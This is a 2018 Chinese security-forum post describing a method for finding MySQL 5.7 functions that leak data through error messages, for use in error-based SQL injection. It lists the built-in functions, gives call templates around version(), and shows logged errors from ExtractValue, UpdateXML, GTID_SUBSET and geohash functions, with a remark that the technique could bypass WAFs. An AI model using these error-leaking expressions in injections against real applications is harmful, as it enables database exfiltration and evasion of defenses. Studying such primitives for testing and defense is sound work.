Mysql报错注入简单测试模型

Track-宁邪   ·   发表于 2018-03-05 17:44:55   ·   漏洞文章

测试Mysql环境:Mysql 5.7.12-log Mysql Community Server(GPL)

1、收集内置函数

http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html

2、整理列表


select ABS();
select ACOS();
select add();
select ADDDATE();
select addslashes();
select ADDTIME();
select AES_DECRYPT();
select AES_ENCRYPT();
select ANY_VALUE();
select Area();
select AsBinary();
select ASCII();
select ASIN();
select AsText();
select AsWKB();
select AsWKT();
select ASYMMETRIC_DECRYPT();
select ASYMMETRIC_DERIVE();
select ASYMMETRIC_ENCRYPT();
select ASYMMETRIC_SIGN();
select ASYMMETRIC_VERIFY();
select ATAN();
select ATAN2();
select AVG();
select BENCHMARK();
select BIN();
select BIT_AND();
select BIT_COUNT();
select BIT_LENGTH();
select BIT_OR();
select BIT_XOR();
select Buffer();
select CAST();
select CEIL();
select CEILING();
select Centroid();
select CHAR();
select CHAR_LENGTH();
select CHARACTER_LENGTH();
select CHARSET();
select E();
select COERCIBILITY();
select COLLATION();
select COMPRESS();
select CONCAT();
select CONCAT_WS();
select CONNECTION_ID();
select Contains();
select CONV();
select CONVERT();
select CONVERT_TZ();
select ConvexHull();
select COS();
select COT();
select COUNT();
select CRC32();
select CREATE_ASYMMETRIC_PRIV_KEY();
select CREATE_ASYMMETRIC_PUB_KEY();
select CREATE_DH_PARAMETERS();
select CREATE_DIGEST();
select Crosses();
select crypt();
select CURDATE();
select CURRENT_DATE();
select CURRENT_TIME();
select CURRENT_TIMESTAMP();
select CURRENT_USER();
select CURTIME();
select DATABASE();
select DATE();
select DATE_ADD();
select DATE_FORMAT();
select DATE_SUB();
select DATEDIFF();
select DAY();
select DAYNAME();
select DAYOFMONTH();
select DAYOFWEEK();
select DAYOFYEAR();
select DECODE();
select decr();
select DEFAULT();
select DEGREES();
select delete();
select DES_DECRYPT();
select DES_ENCRYPT();
select Dimension();
select Disjoint();
select Distance();
select ELT();
select ENCODE();
select ENCRYPT();
select EndPoint();
select Envelope();
select Equals();
select EXP();
select EXPORT_SET();
select expr IN ();
select expr NOT IN ();
select ExteriorRing();
select EXTRACT();
select ExtractValue();
select FIELD();
select FIND_IN_SET();
select FLOOR();
select FORMAT();
select FOUND_ROWS();
select FROM_BASE64();
select FROM_DAYS();
select FROM_UNIXTIME();
select GeomCollFromText();
select GeomCollFromWKB();
select GeometryCollection();
select GeometryCollectionFromText();
select GeometryCollectionFromWKB();
select GeometryFromText();
select GeometryFromWKB();
select GeometryN();
select GeometryType();
select GeomFromText();
select GeomFromWKB();
select get();
select GET_FORMAT();
select GET_LOCK();
select gethostbyaddr();
select gethostbyaddr_r();
select gethostbyname();
select gethostbyname_r();
select getrusage();
select gettimeofday();
select GLength();
select GREATEST();
select GROUP_CONCAT();
select GTID_SUBSET();
select GTID_SUBTRACT();
select HEX();
select HOUR();
select IF();
select IFNULL();
select IN();
select incr();
select INET6_ATON();
select INET6_NTOA();
select INET_ATON();
select INET_NTOA();
select INSERT();
select INSTR();
select InteriorRingN();
select Intersects();
select INTERVAL();
select IS_FREE_LOCK();
select IS_IPV4();
select IS_IPV4_COMPAT();
select IS_IPV4_MAPPED();
select IS_IPV6();
select IS_USED_LOCK();
select IsClosed();
select IsEmpty();
select ISNULL();
select IsSimple();
select JSON_APPEND();
select JSON_ARRAY();
select JSON_ARRAY_APPEND();
select JSON_ARRAY_INSERT();
select JSON_CONTAINS();
select JSON_CONTAINS_PATH();
select JSON_DEPTH();
select JSON_EXTRACT();
select JSON_INSERT();
select JSON_KEYS();
select JSON_LENGTH();
select JSON_MERGE();
select JSON_OBJECT();
select JSON_QUOTE();
select JSON_REMOVE();
select JSON_REPLACE();
select JSON_SEARCH();
select JSON_SET();
select JSON_TYPE();
select JSON_UNQUOTE();
select JSON_VALID();
select LAST_DAY();
select LAST_INSERT_ID();
select LCASE();
select LEAST();
select LEFT();
select LENGTH();
select Length();
select LineFromText();
select LineFromWKB();
select LineString();
select LineStringFromText();
select LineStringFromWKB();
select LN();
select LOAD_FILE();
select LOCALTIME();
select LOCALTIMESTAMP();
select LOCATE();
select LOG();
select LOG10();
select LOG2();
select LOWER();
select LPAD();
select LTRIM();
select MAKE_SET();
select MAKEDATE();
select MAKETIME();
select MASTER_POS_WAIT();
select MATCH();
select MAX();
select MBRContains();
select MBRCoveredBy();
select MBRCovers();
select MBRDisjoint();
select MBREqual();
select MBREquals();
select MBRIntersects();
select MBROverlaps();
select MBRTouches();
select MBRWithin();
select MD5();
select MICROSECOND();
select MID();
select MIN();
select MINUTE();
select MLineFromText();
select MLineFromWKB();
select MOD();
select MONTH();
select MONTHNAME();
select MPointFromText();
select MPointFromWKB();
select MPolyFromText();
select MPolyFromWKB();
select MultiLineString();
select MultiLineStringFromText();
select MultiLineStringFromWKB();
select MultiPoint();
select MultiPointFromText();
select MultiPointFromWKB();
select MultiPolygon();
select MultiPolygonFromText();
select MultiPolygonFromWKB();
select my_open();
select NAME_CONST();
select NOT IN();
select NOW();
select NULLIF();
select NumGeometries();
select NumInteriorRings();
select NumPoints();
select OCT();
select OCTET_LENGTH();
select OLD_PASSWORD();
select ORD();
select Overlaps();
select PASSWORD();
select PERIOD_ADD();
select PERIOD_DIFF();
select PI();
select Point();
select PointFromText();
select PointFromWKB();
select PointN();
select PolyFromText();
select PolyFromWKB();
select Polygon();
select PolygonFromText();
select PolygonFromWKB();
select POSITION();
select POW();
select POWER();
select pthread_mutex();
select QUARTER();
select QUOTE();
select RADIANS();
select RAND();
select RANDOM_BYTES();
select RELEASE_ALL_LOCKS();
select RELEASE_LOCK();
select REPEAT();
select REPLACE();
select replace();
select REVERSE();
select RIGHT();
select ROUND();
select ROW_COUNT();
select RPAD();
select RTRIM();
select SCHEMA();
select SEC_TO_TIME();
select SECOND();
select SESSION_USER();
select set();
select setrlimit();
select SHA();
select SHA1();
select SHA2();
select SIGN();
select SIN();
select SLEEP();
select SOUNDEX();
select SPACE();
select SQRT();
select SRID();
select ST_Area();
select ST_AsBinary();
select ST_AsGeoJSON();
select ST_AsText();
select ST_AsWKB();
select ST_AsWKT();
select ST_Buffer();
select ST_Buffer_Strategy();
select ST_Centroid();
select ST_Contains();
select ST_ConvexHull();
select ST_Crosses();
select ST_Difference();
select ST_Dimension();
select ST_Disjoint();
select ST_Distance();
select ST_Distance_Sphere();
select ST_EndPoint();
select ST_Envelope();
select ST_Equals();
select ST_ExteriorRing();
select ST_GeoHash();
select ST_GeomCollFromText();
select ST_GeomCollFromTxt();
select ST_GeomCollFromWKB();
select ST_GeometryCollectionFromText();
select ST_GeometryCollectionFromWKB();
select ST_GeometryFromText();
select ST_GeometryFromWKB();
select ST_GeometryN();
select ST_GeometryType();
select ST_GeomFromGeoJSON();
select ST_GeomFromText();
select ST_GeomFromWKB();
select ST_InteriorRingN();
select ST_Intersection();
select ST_Intersects();
select ST_IsClosed();
select ST_IsEmpty();
select ST_IsSimple();
select ST_IsValid();
select ST_LatFromGeoHash();
select ST_Length();
select ST_LineFromText();
select ST_LineFromWKB();
select ST_LineStringFromText();
select ST_LineStringFromWKB();
select ST_LongFromGeoHash();
select ST_MakeEnvelope();
select ST_MLineFromText();
select ST_MLineFromWKB();
select ST_MPointFromText();
ST_MPointFromWKB();
select ST_MPolyFromText();
select ST_MPolyFromWKB();
select ST_MultiLineStringFromText();
select ST_MultiLineStringFromWKB();
select ST_MultiPointFromText();
select ST_MultiPointFromWKB();
select ST_MultiPolygonFromText();
select ST_MultiPolygonFromWKB();
select ST_NumGeometries();
select ST_NumInteriorRing();
select ST_NumInteriorRings();
select ST_NumPoints();
select ST_Overlaps();
select ST_PointFromGeoHash();
select ST_PointFromText();
select ST_PointFromWKB();
select ST_PointN();
select ST_PolyFromText();
select ST_PolyFromWKB();
select ST_PolygonFromText();
select ST_PolygonFromWKB();
select ST_Simplify();
select ST_SRID();
select ST_StartPoint();
select ST_SymDifference();
select ST_Touches();
select ST_Union();
select ST_Validate();
select ST_Within();
select ST_X();
select ST_Y();
select StartPoint();
select STD();
select STDDEV();
select STDDEV_POP();
select STDDEV_SAMP();
select STR_TO_DATE();
select STRCMP();
select SUBDATE();
select SUBSTR();
select SUBSTRING();
select SUBSTRING_INDEX();
select SUBTIME();
select SUM();
select SYSDATE();
select SYSTEM_USER();
select TAN();
select TIME();
select TIME_FORMAT();
select TIME_TO_SEC();
select TIMEDIFF();
select TIMESTAMP();
select TIMESTAMPADD();
select TIMESTAMPDIFF();
select TO_BASE64();
select TO_DAYS();
select TO_SECONDS();
select Touches();
select TRIM();
select TRUNCATE();
select UCASE();
select UNCOMPRESS();
select UNCOMPRESSED_LENGTH();
select UNHEX();
select UNIX_TIMESTAMP();
select UpdateXML();
select UPPER();
select USER();
select UTC_DATE();
select UTC_TIME();
select UTC_TIMESTAMP();
select UUID();
select UUID_SHORT();
select VALIDATE_PASSWORD_STRENGTH();
select VALUES();
select VAR_POP();
select VAR_SAMP();
select VARIANCE();
select VERSION();
select WAIT_FOR_EXECUTED_GTID_SET();
select WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS();
select WEEK();
select WEEKDAY();
select WEEKOFYEAR();
select WEIGHT_STRING();
select Within();
select X();
select Y();
select YEAR();
select YEARWEEK();

3、构造测试模型


select functionname(version());
select functionname(1,version());
select functionname(version(),1);
select functionname(version(),1,1);
select functionname(1,version(),1);
select functionname(version(),1,1);

4、在mysql command line设置log输出位置

tee Y:/sqllog.txt

5、将3中的模型通过replace的方式放到2中列表里,直接将结果粘贴到command line里。

由于列表中包含换行字符sql语句将会依次执行。

6、以-log为关键字通过log文件整理有效的报错注入结果:

01mysql> select ST_LatFromGeoHash(version());
02ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LATFROMGEOHASH
03mysql> select ST_LongFromGeoHash(version());
04ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LONGFROMGEOHASH
05mysql> select ExtractValue(1,version());
06ERROR 1105 (HY000): XPATH syntax error: '.12-log'
07mysql> select GTID_SUBSET(version(),1);
08ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
09mysql> select GTID_SUBTRACT(version(),1);
10ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
11mysql> select ST_PointFromGeoHash(version(),1);
12ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function st_pointfromgeohash
13mysql> select UpdateXML(1,version(),1);
14ERROR 1105 (HY000): XPATH syntax error: '.12-log'

感觉还不错。回头慢慢加大测试pattern看能不能得到更多有趣的结果。

这个如果详细测试出来结果,很多waf又可以被绕过了。


打赏我,让我更有动力~

0 条回复   |  直到 2018-3-5 | 1986 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.